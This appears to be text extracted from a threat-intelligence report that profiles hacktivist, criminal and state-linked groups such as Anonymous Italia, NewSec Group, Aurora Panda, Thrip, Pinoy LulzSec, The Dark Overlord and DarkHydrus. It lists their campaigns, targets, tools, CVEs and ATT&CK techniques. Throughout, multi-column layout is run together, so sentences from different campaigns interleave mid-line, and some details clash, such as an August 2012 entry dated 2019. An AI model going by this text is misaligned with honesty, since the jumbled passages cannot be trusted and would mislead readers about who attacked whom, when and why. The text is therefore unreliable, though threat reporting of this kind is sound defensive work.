Anon Italia Cyber Criminal
Administration & Objectives _
Aviation
Cyber Terrorist Education
Hacktivist Food and Agriculture
Government Agencies
Hospitality
International Organizations
35 Unknown Manufacturing
Media Language
Military
Naval Italian
Pharmaceutical
Research
Retail
CAMPAIGNS
April 2012 - FIMI Attack population living in Amazon rainforest. November 2014 - #OpSAP (Italy’s
On April 8, 2012, Anonymous Italia claimed On June 22, 2014, Anonymous Italia Police Work Union) Attack
responsibility for hacking the Italian Music claimed responsibility for hacking the On November 11, 2014, Anonymous
Industry Federation (FIMI- hxxps://www.fimi. website of the EU Sustainable Energy Italia claimed responsibility for leaking
it), dumping two sensitive databases of the Week (#EUSEW2014), allegedly dumping information from the Police Work Union
organization on a text-sharing platform. thousands of records of organizations servers (hxxps://www.sap-nazionale.org),
participating to the initiative, such as the to protest the court verdict in the Stefano
April 2012 - Trenitalia Attack World Bank, Bayer, ExxonMobil, Enel, Edf, Cucchi’s death trial.
On April 12, 2012, Anonymous Italia GE, Shell, BP, Eni, Nokia, Intel, and more.
claimed responsibility for taking down On October 16, 2014, Anonymous Italia November 2014 - Lega Nord Attack
(#TangoDown) the website of Trenitalia, defaced the website of Apulia Regional On November 16, 2014, Anonymous
the main Italian train operator. Council to protest the environmental Italia claimed responsibility for defacing
damage caused by the Taranto’s steelwork the Lega Nord party’s website (Leganord.
August 2012 - On August 31, 2019, company Ilva. org), protesting its alleged racist ideology
Anonymous Italia hacked into the Italian February 21, 2016, dumped online data and policies.
Ministry for Economic Development stolen from the website of Apulia region’s
exploiting a Joomla CMS misconfiguration regional council, against the decision of November 2014 - Italian Penitentiary
to exfiltrate a website configuration site. construction a gas pipeline crossing the Police Attack
September 2012-ongoing - #OpGreenRights area. Very popular in 2019, with attacks On November 22, 2014, Anonymous
OpGreenRights is a longstanding hacktivist against Ministero Ambiente (Ministry of Italia claimed responsibility for hacking
campaign joined by numerous Anonymous- Environment). the servers of the Italian Penitentiary Police
affiliated groups worldwide (hxxps://twitter. leaking a significant volume of data. The
September 2012 - Monsanto Attack motive behind the attack is to protest the
com/OpGreenRights). Anonymous Italia
On September 17, 2012, Anonymous numerous detainees’ deaths during the
participates to the campaign since its early
Italia claimed responsibility for DDoSing past ten years.
inception, usually focusing on environment
the Italian website of Monsanto, in the
grievances pertaining to Italy. A review December 2014 - #NoTAV Attack
context of a global mobilization against
of the key operations is as follows: On
the company. On December 12, 2014, Anonymous
September 11, 2012, Anonymous Italia
Italia claimed responsibility for defacing
promoted a live demonstration against October 2012 - Italian Police Attack 100 subdomains of the rhonealpes.fr
Monsanto, in multiple Italian cities. On On October 22, 2012, Anonymous Italia
April 16, 2014, Anonymous Italia targeted domains, related to the French Rhône-Alpes
leaked online a substantial volume of Regional Council. The motive behind the
the website of Tuscany’s environmental data allegedly subtracted from the Italian
services provider A.S.A. S.p.A. (hxxps:// attack is to protest the railroad project
Police’s servers. called TAV, which is expected to connect
www.asaspa.it). The hackers access the
Turin with Lion.
servers of the company, tampering with April 2014 - Italian Government
and leaking the data, and performing and Defense Attack December 2014 - #OpItaly On
defacement attacks. On April 10, 2014, v DDoSing websites December 25, 2014,
On May 5, 2014, claimed responsibility related to the Italian Government and Anonymous Italia claimed responsibility
for hacking the servers of the Riva Group, Defense Ministry. Allegedly, the websites for leaking an archive comprising more
one of main Italian steel producers, have been down for hours. than 1500 private documents of the Italian
accusing the company to contaminate Police, for revenge.
the population living in the proximity of April 2014 - “Jobs Act” Attack
its facilities. Sensitive documents and In the context of the job reforms proposed March 2015 - Attacks Against Two
email conversations were dumped online. by PM Matteo Renzi, on April 12, 2014, Right-Wing Parties
On June 13, 2014, Anonymous Italia Anonymous Italia claimed responsibility for On March 15, 2015, Anonymous Italia
claimed responsibility for DDoSing the DDoSing the website of the Prime Minister, claimed responsibility for DDoSing multiple
website of the Brazilian military police, the website of the Italian Ministry of Labor, websites of the Italian right-wing parties
to protest its treatment of the indigenous as well as the one of the Italian police. Casapaund and Forza Nuova.
2012 2013 2014 2015 2016
Apr-2012 Aug-2012 Sep-2012 Apr-2014 Nov-2014 Dec-2014 Mar-2015 May-2015

FIMI attack Anonymous Italia Monsanto attack Italian • #OpSAP (Italy’s • #NoTAV Attacks Against Italian Ministry of
hacked into the Government and Police Work Attack Two Right-Wing Defense Attack
Apr-2012 Italian Ministry Defense Attack Union) Attack Parties
for Economic
Oct-2012 • #OpItaly On
• Lega Nord December Jul-2015
Trenitalia attack Development Italian Police Apr-2015
Apr-2014 Attack 25, 2014, Attack Against Italian
attack
• Italian AIFA Attack Enforcement Agenci
“Jobs Act” Attack
Penitentiary
Police Attack
Targeted
Countries _
Brazil
France
Italy
Italy
April 2015 - AIFA Attack On April March 2016 - Campaign against May 2017 - Ministry of Foreign
29, 2015, the Italian Security Forces Affairs Attack
Anonymous Italia claimed responsibility for On March 1, 2016, Anonymous Italia On May 20, 2017, Anonymous Italia,
hacking the Italian Pharmaceutical Agency claimed responsibility for DDoSing the together with LulzSec And AntiSec, hacked
(AIFA), defacing its website. The motivation websites of the Italian Carabinieri, Police, the Italian Ministry of Foreign Affairs’
for the attack was to damage the global and Defense and Interior Ministries. servers, publishing sensitive data of the
Pharmaceutical industry, perceived by the ministry personnel.
group as a constant enemy. May 2016 - Lega Nord Attack
On May 11, 2016, Anonymous Italia June 2017 - Carabinieri Attack
May 2015 - Italian Ministry of claimed responsibility for DDoSing the On June 12, 2017, Anonymous Italia
Defense Attack Lega Nord party’s website, leganord.org. claimed responsibility for breaching the
On May 18, 2015, Anonymous Italia servers of the Carabinieri (Italian special
claimed responsibility for leaking the August 2016 - #opNessunDorma forces), dumping online the stolen data.
personal details of over 1700 security Campaign Operation
personnel from the Italian Ministry of #NessunDorma is a campaign carried July 2018 - Ospedale Sant’Andrea
Defense’s databases, publishing them put against over 40 Italian websites, on Attack
online. August 4, 2016. The websites affected by On July 14, 2018, Anonymous Italia claimed
the data breach range from job agencies, responsibility for leaking thousands of
July 2015 - Attack Against Italian private business, consulting companies, to records from the Rome’s hospital Ospedale
Law Enforcement Agencies personal sites. The hacktivists got all the Sant’Andrea, to protest the low level of
On July 20, 2015, Anonymous Italia leaked details after breaching the servers security adopted by the Italian Healthcare
claimed responsibility for defacing several of Engitel, a Milan-based web agency Ministry to protect user data,
websites related to the Italian LEA, dumping providing e-commerce solution to all
online a significant volume of stolen data. the above-mentioned companies. The O c t o b e r/ N o v e m b e r 2 0 1 8 -
The attacks are a revenge for the arrest of motivation was to fight against the new #FifthOfNovember Campaign
two Anonymous Italia members, named labor laws and temporary employment The hacktivists launched a series of attacks
Aken and Otherwise. agencies. against dozens of targets in an apparent
random fashion. Notable among them Rome
February 2016 - #OpHomes September 2016 - Libero Quotidiano and Milan universities, local municipalities,
Campaign Attack national research institutions, and Healthcare
On February 16 and 18, 2016, Anonymous On September 21, 2016, Anonymous federations. Most of the attacks resulted
Italia claimed responsibility for stealing Italia claimed responsibility for leaking in sensitive data being published online.
data and defacing multiple websites of personal details of registered users and
Italian police labor unions, in a protest editorial staff of the Italian newspaper December 2018 - Healthcare
against the eviction of families from their Libero (liberoquotidiano.it). Institutions Attack
houses in Livorno and Padua. On February On December 24, 2018, Anonymous Italia
20, 2016, in continuation of the previous October 2016 - Penitentiary Police claimed responsibility for hacking dozens
attacks, the hacktivists DDoSed the website Attack of Italian healthcare institutions, defacing
of the Italian Ministry of Infrastructure and On October 12, 2016, Anonymous Italia and leaking a notable volume of data.
Transportation. claimed responsibility for breaching the
servers of the Italian Penitentiary Police February 2019 - #OpSardegna
February 2016 - Attack Against and related organizations. Campaign
Nuovo Centro Destra On February 12, 2019, Anonymous Italia
On February 25, 2016, Anonymous February 2017 - Forza Nuova Attack claimed responsibility for hacking Sardegna
Italia claimed responsibility for DDoSing On February 21 2017, Anonymous regional council website, as well as other
the website of the Italian right-wing party Italia claimed responsibility for defacing local websites to protest the government
Nuovo Centro Destra. again the Forza Nuova right-wing party’s agricultural policies vis-a-vis the region.
website(forzanuova.eu).
May-2016 Oct-2016
Lega Nord Attack Penitentiary Police Attack
2017 2018 2019 2020
Feb-2016 Aug-2016 Feb-2017 Jun-2017 Jul-2018 Dec-2018

Attack Against Nuovo #OpNessunDorma Forza Nuova Carabinieri Ospedale Healthcare
Centro Destra Campaign Operation Attack Attack Sant’Andrea Institutions Attack
Attack
Mar-2016 Sep-2016 May-2017
n Law Campaign against the Libero Quotidiano Ministry of Foreign Oct-2018 Feb-2019
ies Italian Security Forces Attack Affairs Attack #FifthOfNovember #OpSardegna
Campaign Campaign
147
DEMONSAD3 Education Ideology
Cyber Terrorist
DEMONSAD Financial Services
DEMONSAD SECURITY Hacktivist Food and Agriculture
R
CAMPIOLO State Sponsored Government Agencies
(not certain) Healthcare
Unknown
33 TAG-HA14 I nternational Language
Organizations Portuguese
DESCRIPTION
A Portuguese-speaking hacktivist that is we assume that he is from Brazilian campaigns. He is highly active on social
affiliated with NewSec Group and Lulzsec nationality. He also hacks different targets networks, especially on Twitter and YouTube,
Brazil. He usually targets Brazilian websites affiliated with various sectors around the and usually publishes data leaks in his
with different attack vectors, and therefore world and participates in different cyber pastebin account.
CAMPAIGNS
2018-2019
2018 - 2019 - OpSudan related to American official websites. 2018
OpSudan
A cyber campaign that supports the
June 2019 - Targeting the website of
protests against the Sudanese government.
the national university of Columbia
During March 2019, DemonSad3 claimed
responsibility for shutting down a government DemonSad3 published on his pastebin
Sudanese website. account a database allegedly related to
the website of the national university of
April 2019 - OpAssange Columbia.
A cyber campaign against the extradition
June 2019 - Targeting a government
of Julian Assange in April 2019. During
website of Paraguay
April 2019, DemonSad3 defaced two Jun-2019
government Brazilian websites and a DemonSad3 published on his pastebin Targeting a
British website. account a database allegedly related to government

website of
a government website of Paraguay. 2019
Paraguay
June 2019 - OpIndonesia
August 2019 - Targeting websites Jun-2019
A cyber campaign launched to protest
against the violent clashes caused after of Angola Targeting the
website of the
the Indonesian elections (April 17, 2019) DemonSad3 claimed responsibility for Apr-2019
national university
of Columbia
and the announcement of the Indonesian mass defacing websites of a company OpAssange
General Elections Commission on May 21, that operates in Angola. DemonSad3

Jun-2019 Jun-2019
2019. DemonSad3 claimed responsibility claimed responsibility for shutting down OpIndonesia OpUSA
for leaking data of Indonesian government and defacing various Brazilian government
and official websites and tweeted links to Aug-2019
and official websites. Targeting websites
allegedly related data leakages of Angola
June 2019 - OpUSA
A cyber campaign against the United
States. During June 2019, DemonSad3
2020
published links to databases allegedly

Custom tools Publicly available tools None Identified
None Identified Metasploit Exploited vulnerabilities
Tools used by multiple adversaries SQLmap
WordPress
None Identified Nmap
J oomla Component com_kunena
SQL Injection exploit
p aping.exe A pentesting tool
p oof.pl A simple script written in Perl
s amirox.dz

Targeted
Countries _
Angola
Brazil
Columbia
Indonesia
Paraguay
Sudan
United Kingdom
United States
Brazil
Initial Access Collection Impact

T1190 - Exploit Public-Facing Application T1005 - Data from Local System T1498 - Network Denial of Service
149
ATK 137 Cyber Criminal Defense & Objectives _
NEWSEC GROUP Education Ideology
Cyber Terrorist
Hacktivist
Government Agencies
State Sponsored Media
Unknown
33
Language
Portuguese and English
DESCRIPTION
A group of hacktivists led by a threat against the authorities. The group was fact that some of their tweets are both
actor dubbed DemonSad. The group observed conducting mainly DDoS attacks in English and Brazilian Portuguese. In
was involved in multiple cyber campaigns and several data leaks. We assume with addition, DemonSad and other group
targeting various countries around the world medium probability that the group is members’ twitter account information is
in order to support civil demonstrations originated from Brazil, mostly due to the in Brazilian Portuguese.
CAMPAIGNS
2013 - present - #OpIsrael April 2019 - #OpUK 2013
A pro-Palestinian and anti-Israel cyber A cyber campaign against the UK because 2013-present
campaign which occurs annually on April they arrested Julian Assange after Ecuador’s #OpIsrael
7 since 2013. NewSec Group claimed extradition. NewSec Group claimed
responsibility for allegedly shutting down responsibility for shutting down and defacing
2014
Israeli government websites. government and other British websites.
2015 - present - #OpVenezuela May 2019 - #OpHonduras
A cyber campaign that protests against A cyber campaign that supports the
the political and socioeconomic crisis in demonstrations against the government.
Venezuela. During March 2019, NewSec NewSec Group claimed responsibility 2015
Group claimed responsibility for shutting for shutting down a government website.
2019-present
down government and official websites
of Venezuela. June 2019 - #OpIndonesia #OpVenezuela
A cyber campaign launched to protest

2018 - 2019 - #OpNicaragua against the violent clashes caused after 2016
A cyber campaign that supports the the Indonesian elections (April 17, 2019)
demonstrations against the government. and the announcement of the Indonesian
During March 2019, NewSec Group General Elections Commission on May 21,
claimed responsibility for shutting down 2019. NewSec Group claimed responsibility
two government websites of Nicaragua. for shutting down and leaking data of 2017
Indonesian government websites.
2018 - 2019 - #OpSudan
A cyber campaign that supports the protests June 2019 - #OpHongKong
against the Sudanese government. During A cyber campaign launched to support the
March 2019, NewSec Group claimed demonstrations against the government. 2018
responsibility for shutting down government During June 2019, NewSec Group tweeted 2018-2019 2018-2019
and official Sudanese websites. a link to a database allegedly stolen from #OpNicaragua #OpSudan
an education institution in Hong Kong. To
A p r i l 2 0 19 - # O p E c u a d o r / date, the database is unavailable.
#OpAssange Apr-2019
Apr-2019
A cyber campaign against Ecuador after 2019 - Targeting Brazilian Websites 2019 #OpEcuador /
#OpAssange #OpUK
they extradited Julian Assange in April NewSec Group claimed responsibility
May-2019
2019. During April 2019, NewSec Group for shutting down and defacing various Jun-2019 #OpHonduras
claimed responsibility for shutting down Brazilian government and official websites #OpIndonesia
and tweeted links to allegedly related Jun-2019
and defacing government and financial
2020 2019 #OpHongKong
websites of Ecuador. data leakages. Targeting Brazilian
Websites

Targeted
Countries _
Brazil S
audi
Ecuador Arabia
Hong Kong Sudan
Hundoras U
nited
Israel Kingdom
Indonesia Venezuela
Nicaragua
Brazil
Initial Access Collection Impact

T1190 - Exploit Public-Facing Application T1005 - Data from Local System T1491 - Defacement

DarknessGhost
None Identified
None Identified
151
ATK2 Education
AURORA PANDA Espionage
Cyber Terrorist
AXIOM Financial Services
BARIUM Hacktivist Government Agencies
BLACKFLY
DEPUTY DOG State Sponsored High-Tech
DOGFISH Industry
GROUP 72 Unknown
32 GROUP 8 Media
HIDDEN LYNX
Language
LEAD Unknown
RAGEBEAST
TAILGATER
DESCRIPTION
ATK2 is a threat group in operation since at need to be made up of between 50 and The team which distributes the Naid
least 2009. It was described by Symantec 100 individuals. The infrastructure used backdoor used during the Bit9 attack,
as a professional organization that offers a during the attacks was mostly originated the VOHO campaign and the Aurora
“hackers for hire” service. They can target from China. Operation. This team seems to operate
multiple organizations with concurrently This group is composed of two sub-groups against high value targets and be composed
running attacks, operating efficiently and using two different backdoors to achieve of more skillful attackers.
moving quickly and methodically. The different goals:
group regularly integrates new zero-day
The team which distributes the Moudoor
exploits in its arsenal and customizes
backdoor which is a customized version
them quickly demonstrating a skillset in
of Gh0st RAT. They are responsible for
superior to APT1 which is also operation
large-scale attacks which require a large
in that region. Based on these factors,
number of people to operate.
Symantec estimate that the group would

BLACKCOFFEE None CVE-2011-0611 CVE-2012-1535
CVE-2013-3893 CVE-2011-0609
CVE-2012-4792 CVE-2011-2110
CVE-2012-1875 CVE-2014-0322

Targeted
Countries _
Australia Russia
Canada Singapore
China S
outh Korea
France Taiwan
Germany U
nited
H
ong Kong Kingdom
India U
nited
Japan States
China
CAMPAIGNS
Operation Aurora Attack on the French Aerospace 2010
Jan-2010
Operation Aurora
The Aurora malware operation was identified A strategic web compromised leveraging
recently and made public by Google the CVE-2014-0322 zero-day to infect
and McAfee. This malware operation victims with the ZxShell malware targeted
has been associated with intellectual the website of the Veterans of Foreign
property theft including source code and Wars, a U.S. organization. One month
technical diagrams (CAD, oil exploration before this attack, another threat group
bid-data, etc). Companies hit have been used the same vulnerability to conduct
2011
publically speculated, including Google, attacks against the French Aerospace
Adobe, Yahoo, Symantec, Juniper Systems, sector and compromise the website of
Rackspace, Northrop Grumman, ExxonMobil, Capstone Turbine, a U.S.-based turbine
ConocoPhillips, and Dow Chemical. The manufacturer.
malware package used with Aurora is
mature and been in development since
at least 2006.
As a result of the attack, Google stated in 2012
its blog that it plans to operate a completely

uncensored version of its search engine
in China “within the law, if at all”, and
acknowledged that if this is not possible
it may leave China and close its Chinese
offices. Official Chinese sources claimed
this was part of a strategy developed by
2013
the U.S. government.
Operation DeputyDog
Operation led by the Hidden Lynx group,
Aug-2013
Links are established with the Ephemeral
Operation
Hydra and Snow Man campaigns. This DeputyDog
operation targets Japan in particular. Nov-2013

Operation Feb-2014
2014
Operation Ephemeral Hydra Ephemeral Hydra
French Aerospace-
Focused
Operation led by the Hidden Lynx group CVE-2014-0322
attack shares
(ATK2). Links have been established with similarities with
the DeputyDog and SnowMan campaigns. 2012 Capstone
Turbine Activity
The targets are not known, but the use of
a watering hole site is not known. This site
is of strategic importance and is visited
by people interested in national and 2015
international security policies.
153
ATK2 Education
AURORA PANDA Espionage
Cyber Terrorist
AXIOM Financial Services
BARIUM Hacktivist Government Agencies
BLACKFLY
DEPUTY DOG State Sponsored High-Tech
DOGFISH Industry
GROUP 72 Unknown
32 GROUP 8 Media Language
HIDDEN LYNX Unknown
LEAD
RAGEBEAST
TAILGATER

Targeted
Countries _
Australia Russia
Canada Singapore
China S
outh Korea
France Taiwan
Germany U
nited
H
ong Kong Kingdom
India U
nited
Japan States
China
Initial Access Command and Control

T1189 - Drive-by Compromise T1071 - S tandard Application Layer
Persistence Protocol
T1132 - Data Encoding
Defense Evasion T1094 - Custom Command and Control
T1140 - Deobfuscate/Decode Files or Protocol
Information
155
THRIP Communication Espionage
Cyber Terrorist
Defence G
athering information
Hacktivist on satellite operating
High-Tech
State Sponsored infrastructure
Unknown
32
Language
Unknown
DESCRIPTION
Thrip is a Chinese cyber-espionage group telecommunication operator in Southern modified, maybe due to a mistake, and
targeting telecommunications, geospatial Asia. nothing remains but the Catchamas
imaging end defence sectors in the United The day of its publication, the article from info stealer trojan. Because of these
States and Southeast Asia. Thrip was Symantec described five custom malwares: circumstances, the information presented
uncovered in January 2018 by Symantec Rikamaru, Catchamas, Mycicil, Spedear here is with moderate confidence.
during a campaign targeting an important and Syndicasec. But this article has been
CAMPAIGNS
Thrip targets Southeast Asia operator. The attack group seemed to be
Jan-2018
In January 2018, it was discovered that particularly interested in the operational side 2018
Thrip targets
Thrip had launched an espionage campaign of the company, looking for and infecting Southeast Asia
against a major telecommunications computers running software that monitors

operator in Southeast Asia that had been and controls satellites. This suggests to us
going on since 2017. During the last wave that Thrip’s motives go beyond Espionage
of attack, which began in 2017, Thrip and may also include disruption.
had targeted a satellite communications
2019

Catchamas LogMeIn None
Mimikatz
PsExec
PowerShell
WinSCP

Targeted
Countries _
Philippines
Taiwan
United States
Vietnam
China
Execution Credential Access Exfiltration

T1086 - PowerShell T1003 - Credential Dumping T1048 - E xfiltration Over Alternative
Persistence T1098 - Account Manipulation Protocol
T1098 - Account Manipulation Command and Control
T1219 - Remote Access Tools
157
ATK 129 Cyber Criminal Administration & Objectives _
Pinoy LulzSec Aviation Personal-satisfaction
Cyber Terrorist Defense
TAG-HA9 Unpredictable
Hacktivist Education
Food and Agriculture
Unknown Healthcare
31 Manufacturing Language
Military Filipino, English
Retail
Transportation
DESCRIPTION
Pinoy LulzSec is the Philippines branch of the mostly website defacements and data leaks, In fact, in line with their modus operandi
international LulzSec movement, therefore which were subsequently dumped online and search for visibility, the hacktivists run
they embrace an anarchist/destructive on file-sharing platforms. We also observed multiple social media accounts, mainly
ideology. According to their statements, numerous social media account takeovers, on Twitter and Facebook, where they
Pinoy LulzSec hacktivists have allegedly been ostensibly performed via spear-phishing. announce their future intentions and boast
active since 2012. However, we found the The hackers show a clear preference for about their attacks. Of note, the hackers
bulk of their activity being concentrated in attacking government-related targets, have been conducting defacement attacks
2017-2018. The group was responsible but also have a penchant for education against poorly secured websites of over
for numerous cyber-attacks in the past institutions. This finding indicates that 30 countries worldwide, indicating that
years, including notable ones against they are teenagers, still going to school. they largely operate out of opportunity
the Philippine Government and defense This assumption is corroborated by their instead of ideological reasons.
forces in April 2018 and 2019 Fool’s erratic behavior, and vulgar language Pinoy LulzSec’s prominent members: X-m3n
Day campaigns. The hackers conducted used on social media. GrandFather Kangk0ng Soull
dozens of attacks during these campaigns,
CAMPAIGNS
September 2016 - Commission on targets, government and corporate alike, 2016
Elections (COMELEC) Attack the most notable being the breach of the
Pinoy LulzSec hacked into COMELEC Armed Forces of the Philippines (AFP)
exfiltrating the databases hosted therein. data center and subsequent leaking of
soldiers’ data online. Like in the previous Sep-2016
Early April 2018 - April Fool’s Day year’s campaign, the hackers conducted Commission
2018 Attacks defacements, DDoS attacks, data leaks,

on Elections
(COMELEC) Attack
In this campaign, Pinoy LulzSec launched and social media account takeovers. 2017
numerous attacks against Philippines
April 5, 2019 - Jollibee Foods
Government websites, those of Philippines
local authorities, and education institutions. Corporation Hack
Website defacements, DDoS attacks, Pinoy LulzSec hackers leaked the database
and data leakages were the prominent of the Filipino food chain Jollibee on a
attack vectors. text-sharing platform.
April 24, 2018 - Government of April 24, 2019 - Cebu Pacific Air Hack 2018 April 2018
Thailand The Pinoy LulzSec hacker kangk0ng • April Fool’s Day
2018 attacks
The hackers defaced six distinct Thai gained unauthorized access to the Cebu • Government of
Government websites. The motivation Pacific Air’s rewards program GetGo. The Thailand
behind the attack is ostensibly recreational. hackers defaced the GetGo homepage, • Government of
Nepal
but also managed to access the active
April 27, 2018 - Government of Nepal directory of the company, possibly stealing
The hackers published on a text-sharing sensitive data. Apr-2019
2019
• April Fool's Day
platform a Nepal Government database.
April 30, 2019 - jointhearmy[.] 2019 attacks
The motivation behind the attack is likely • Jollibee Foods
recreational. ph Hack Corporation hack
A member of Pinoy Lulzsec named kangk0ng • Cebu Pacific Air

hack
Early April 2019 - April Fool’s Day compromised the recruitment portal of • jointhearmy[.]
2019 Attacks Philippine Army, jointhearmy[.]ph, dumping ph Hack
In this occasion, the hackers conducted a database with personally identifiable

2020
numerous cyber-attacks against a variety of information of 50,000 alleged applicants.

Afghanistan Hungary Poland
Bangladesh India Singapore
Brazil Indonesia Taiwan
Canada Iran Thailand
Central Italy Tunisia
African Japan United
Republic Malaysia Kingdom
China Mali United
Dominica Mexico States
Egypt Nepal Venezuela
France Nigeria
Gabon Pakistan
Germany Philippines
The Philippines
Initial Access Impact

T1190 - Exploit Public-Facing Application T1491 - Defacement
T1192 - Spearphishing Link T1498 - Network Denial of Service

PinoyLulzSec DoS tool
None Identified
None Identified
159
ATK 73 Cyber Criminal
& Objectives _
THE DARK OVERLORD Personal-gain
Cyber Terrorist
TDO
TAG-CR4 Hacktivist
State Sponsored
Unknown
29 Language
English
DESCRIPTION
The Dark Overlord is a highly skilled media production sectors in the US and public domain yet), but also other goods,
cybercrime actor (possibly a well-structured UK, and subsequently put the stolen data such as software source code.
cybercrime syndicate) active since at up for sale or demand ransom from its Alleged Members: Nathan Wyatt AKA
least mid-2016. It entered the public victims. The Dark Overlord appears to “Crafty Cockney”/“mas” - alleged member
spotlight following the 2017 hack of Larson primarily be a financially driven threat arrested in September 2016. Grant West
Studios, and the subsequent release of an actor, with a proven history of success, AKA “Courvoisier” - alleged member
entire season of the TV show “Orange and likely millions of dollars in profits. The arrested in Kent (UK) in May 2018. S.S.
is the New Black.” The Dark Overlord’s threat actor has been prevalently active - alleged member arrested in Belgrade
key business model is to hack into low, on Darknet marketplaces and hacking (Serbia) on May 16, 2018.
medium and high-profile organizations, forums, where he tries to sell “private”
mostly in the healthcare, education, and databases (databases that are not in the
CAMPAIGNS
2016 - Extortion of US Organizations Hollywood audio post-production studio. 2016
2016
The Dark Overlord started their operation According to Larson Studios the group
Extortion of US
by targeting a variety of organizations in was able to breach the network through Organizations
an end point running an outdated version 2016
the United States. Most of the organizations
HL7 Software
were from the medical sector but the group of Windows 7. The group was able to Stolen
also targeted the financial and high-tech download a large number of TV shows Dec-2016
industries. The group demanded ransom the studios were working on and delete Larson Studios
2017 Hack 2017
for not releasing sensitive documents and them from the company servers. They then
Threats to US
patients’ medical records claimed they will release the shows if the schools Parents
received text
studio will not pay them $50,000 (which messages from
2016 - HL7 Software Stolen the studios eventually did). Jun-2017
Netflix attack
The Dark Overlord offered for sale what
they claim to be the source code, software Jun 2017 - Netflix Attack
signing keys and customer license database The Dark Overlord leaked unaired episodes 2018
for a Health Level Seven interface engine. of “Orange is the New Black.” stoled in
the Larson Studios hack. According to the
2017 - Threats to US schools Parents group they decided to leak the information
received text messages from after Larson Studios broke the agreement
The Dark Overlord threatening to harm with them by going to the FBI and as a
or kill their children. way to pressure Netflix to pay. Jan 2019
2019
9/11 Papers
2016 - Larson Studios Hack Jan 2019 - 9/11 Papers
Somewhere around December of The Dark Overlord hacked US and UK
2016 companies, and exfiltrated a large volume
The Dark Overlord were able to get of sensitive documents related to the 9/11
access to the network of Larson Studios, terror attacks-related lawsuits.

Targeted
Countries _
United Kingdom
United States
Serbia, United States, United Kingdom
Initial Access Persistence Impact

T1133 - External Remote Services T1133 - External Remote Services T1485 - Data Destruction
T1190 - Exploit Public-Facing Application Discovery

Custom tools Publicly available tools TrueCrypt/Veracrypt TDO
None Identified None Identified Exploited vulnerabilities
None Identified
None Identified
161
BLUE DRAGON Defense Ideology
Cyber Terrorist
IZNAYE CYBER TEAM Education
TAG-HA4 Hacktivist Energy
High-Tech
Unknown
29
Manufacturing English, French, Spanish
Research
Retail Assumed origin of the attacker
DESCRIPTION
IZNAYE CYBER TEAM is considered to national attack group also consisting out of the IZNAYE CYBER TEAM’s members
be a hacktivist attack Group. According of French and Spanish language speakers. named xS1lenc3d had taken responsibility
to its Twitter account, the group started Its main objectives are governmental under the Pryzraky insignia. Another
recruiting members during May 2019. institutions, but not only, among its targets member dubbed Aft3RNOON_000 was
The group is considered to be a Russian are also commercial organizations, local seen taking responsibility for operations
attack group, as the group uses the Russian authorities, and it was seen joining mainly conducted together with “Team Gh0st”.
Federation flag in its Twitter account and to hacktivist campaigns. Quoting Lenin We have the impression that the above
cites a quote referred to Soviet revolution may suggest the groups’ agenda is driven mentioned cooperation have relation to
leader - Lenin. However, a few of its by a communist ideology. We also noticed common causes and ideology.
members are not Russian speakers and that the group has ties to another hacktivist
we get the impression that it is a multi- team dubbed Pryzraky Group since one
CAMPAIGNS
2019 - #OpSudan government of Ecuador in response to 2019 - #OpHonduras
On April 5, 2019, the group declared they the extradition of WikiLeaks establisher A hacktivist campaign that accuses Honduras
have joined #OpSudan - a hacktivist cyber Julian Assange to the authorities in the regime to be oppressive and tyrannical.
campaign against Omar Al-Bashir’s regime UK. Starting April 14 through April 19, During May 2019, the group claimed
in Sudan. On this campaign, the group 2019, the group took part in various targeting a series of Honduras government
targeted multiple Sudanese Government- cyber-attacks on websites related to the websites.
related domains in defacement, data leaks government of Ecuador and commercial
and DDoS attacks. Among the websites websites in the UK.
2019
that were targeted were the websites of
2019 - #OpFrance
Khartoum Police, the Sudanese Embassy
A hacktivist campaign first launched by
in Germany and more.
Anonymous in solidarity with the Yellow
2019 - #OpIsrael Vests Movement (Mouvement des gilets
During April 2019, the group joined jaunes) in France. On April 11, 2019, the
the pro-Palestinian and anti-Israel cyber group took part in a cyber attack targeting
campaign which occurs annually on DynDNS France Website (dyndns.fr). On
May 1, 2019, a group member dubbed Apr-2019 Apr-2019
April 7 since 2013. On April 11, 2019, #OpSudan #OpIsrael
the group was also mentioned in tweets xS1lenc3d leaked approximately 70,000
regarding its’ part in a DDoS attack targeting emails belonging to customers of Peugeot May-2019 Apr-2019
israeltoday.co.il, an Israeli News Journal France. The leak being published on May #OpHonduras #OpEcuador
Campaign /
website. On the same day the group 1, 2019, a symbolic day for communists, #OpFreeAssange /
#OpAssange
claimed that it had leaked files, emails might support the assumption that the
and subdomains of the Israeli ministry of group or some its actors hold communist Apr-2019
defence. The group was also mentioned ideology. #OpFrance
in taking down alvarion.co.il, an Israel -

2019 - #OpCatalonia / #OpCatlogne Apr-2019
based technology company. According #OpCatalonia /
On April 5, 2019, the group tweeted that
to various tweets, these activites were #OpCatlogne
some of its members will join #OpCatalonia.
conducted in cooperation with #Dext3r
A hacktivist cyber campaign first launched
& @Cyberc0v3nsec.
in 2017 that targets Spanish targets in
2019 - #OpEcuador Campaign / support of Catalonia’s independence.
#OpFreeAssange / #OpAssange
During April 2019, the group joined 2020
the hacktivist campaign targeting the

Targeted
Countries _
Brazil Israel
Colombia Italy
Ecuador Peru
France Spain
Indonesia Sudan
Russia
Initial Access Lateral Movement Exfiltration

T1190 - Exploit Public-Facing Application T1021 - Remote Services T1499 - Endpoint Denial of Service
Credential Access

Custom tools None Identified WordPress
None Identified
None Identified
None Identified
163
DARKHYDRUS Espionage
Cyber Terrorist
LAZYMEERKAT
Hacktivist
State Sponsored
Unknown
28 Language
Unknown
DESCRIPTION
ATK77 (DarkHydrus) is a threat group that since at least 2016. The group heavily
has targeted government agencies and leverages open-source tools and custom
educational institutions in the Middle East payloads for carrying out attacks.
CAMPAIGNS
2018
New Threat Actor Group DarkHydrus Latest Target Attack of DarkHydruns
Targets Middle East Government Group Against Middle East
In July 2018, Unit 42 analysed a targeted 360 Threat Intelligence Center captured
Jul-2018
attack using a novel file type against at several lure Excel documents written in
New threat actor
least one government agency in the Middle Arabic in January 9, 2019. It's confirmed group DarkHydrus
targets Middle East
East. It was carried out by a previously that this is a DarkHydrus Group’s new government
unpublished threat group we track as attack targeting Middle East region.
DarkHydrus. Jan-2019
2019 Latest target attack
of DarkHydrus
group against
Middle East
2020

RogueRobin Cobalt Strike CVE-2018-8414
Mimikatz
Phishery

Targeted
Countries _
Iran
Middle East
Unknown

T1193 - Spearphishing Attachment T1221 - Template Injection T1094 - Custom Command and Control
Execution Credential Access Protocol
T1086 - PowerShell T1187 - Forced Authentication
T1204 - User Execution
165
ATK 136 Cyber Criminal Education & Objectives _
